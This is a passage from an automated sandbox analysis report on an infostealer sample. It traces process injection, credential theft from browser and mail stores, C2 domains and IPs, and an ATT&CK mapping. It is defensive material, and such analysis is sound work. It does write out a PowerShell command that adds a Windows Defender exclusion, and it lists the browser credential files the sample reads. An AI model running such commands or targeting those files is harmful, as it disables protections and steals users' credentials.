                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtSetInformationProcess: Direct from: 0x76F12C5C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtOpenKeyEx: Direct from: 0x76F12B9C
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQueryInformationProcess: Direct from: 0x76F12C26
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtResumeThread: Direct from: 0x76F12FBC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtDelayExecution: Direct from: 0x76F12DDC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtReadFile: Direct from: 0x76F12ADC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtQuerySystemInformation: Direct from: 0x76F12DFC
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; NtAllocateVirtualMemory: Direct from: 0x76F12BFC
                Source: C:\Users\user\Desktop\file.exe; Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\file.exe; Section loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\file.exe; Section loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: read write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\SndVol.exe; Thread register set: target process: 6460
                Source: C:\Windows\SysWOW64\SndVol.exe; Thread APC queued: target process: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe
                Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exe; Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe; Process created: C:\Windows\SysWOW64\SndVol.exe "C:\Windows\SysWOW64\SndVol.exe"
                Source: C:\Windows\SysWOW64\SndVol.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3762337231.000000000075E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Software\Microsoft\Multimedia\Audio\SndVolSndVolPreferencesMaskSndVolSelectedDevicesShell_TrayWnd
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: CQcxGFiNQWzmXwbg1.exe, 00000008.00000002.3767667596.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 00000008.00000000.1584077719.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, CQcxGFiNQWzmXwbg1.exe, 0000000A.00000000.1746226691.0000000001381000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\Desktop\file.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information
                Source: Yara match; File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\SndVol.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\SndVol.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality
                Source: Yara match; File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.3768384183.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1669076954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1671103220.0000000001B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3768451567.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3768386121.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.3757230807.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1671316261.0000000003A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3768471999.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (techniques listed per tactic column, in the report's order; a number before a technique is the count the report shows beside it)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1608104; Sample: file.exe; Start date: 06/02/2025; Architecture: WINDOWS; Score: 100

                Start
                  DNS/IP: www.infiniteture.xyz; www.ticquan.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
                  started file.exe
                    Dropped: C:\Users\user\AppData\Local\...\file.exe.log, ASCII
                    Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                    started file.exe
                      Signatures: Maps a DLL or memory area into another process
                      injected CQcxGFiNQWzmXwbg1.exe
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        started SndVol.exe
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          injected CQcxGFiNQWzmXwbg1.exe
                            DNS/IP: intention.digital 46.38.243.234, ports 50025, 50026, 50027, NETCUP-ASnetcupGmbHDE Germany; sparkletime.cloud 92.60.36.190, ports 49981, 49982, 49983, NETCUP-ASnetcupGmbHDE Germany; 10 other IPs or domains
                            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                          started firefox.exe
                    started powershell.exe
                      Signatures: Loading BitLocker PowerShell Module
                      started WmiPrvSE.exe
                      started conhost.exe
